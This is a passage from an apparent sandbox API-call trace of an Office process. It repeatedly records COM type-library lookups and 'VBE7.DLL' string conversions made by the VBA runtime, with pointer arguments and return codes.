pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.508] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.508] IUnknown:Release (This=0x665ba50) returned 0xd [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.508] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.509] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.509] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.509] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.509] IUnknown:Release (This=0x665ba50) returned 0xd [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.509] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.509] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.509] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.509] IUnknown:Release (This=0x665ba50) returned 0xd [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.509] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.509] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.509] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.509] IUnknown:Release (This=0x665ba50) returned 0xd [0069.509] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.510] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.510] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.510] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.510] IUnknown:Release (This=0x665ba50) returned 0xd [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.510] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.510] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.510] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.510] IUnknown:Release (This=0x665ba50) returned 0xd [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.510] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.510] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.510] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.510] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.510] IUnknown:Release (This=0x665ba50) returned 0xd [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.511] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.511] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.511] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.511] IUnknown:Release (This=0x665ba50) returned 0xd [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.511] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.511] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.511] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.511] IUnknown:Release (This=0x665ba50) returned 0xd [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.511] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.511] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.512] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.512] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.512] IUnknown:Release (This=0x665ba50) returned 0xd [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.512] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.512] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.512] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.512] IUnknown:Release (This=0x665ba50) returned 0xd [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.512] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.512] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.512] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.512] IUnknown:Release (This=0x665ba50) returned 0xd [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.512] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.513] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.513] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.513] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.513] IUnknown:Release (This=0x665ba50) returned 0xd [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.513] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0xc10) returned 0xaffde90 [0069.513] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.513] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.513] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.513] IUnknown:Release (This=0x665ba50) returned 0xd [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.513] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.513] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.513] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.513] IUnknown:Release (This=0x665ba50) returned 0xd [0069.513] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.514] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.514] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.514] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.514] IUnknown:Release (This=0x665ba50) returned 0xd [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.514] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.514] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.514] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.514] IUnknown:Release (This=0x665ba50) returned 0xd [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, 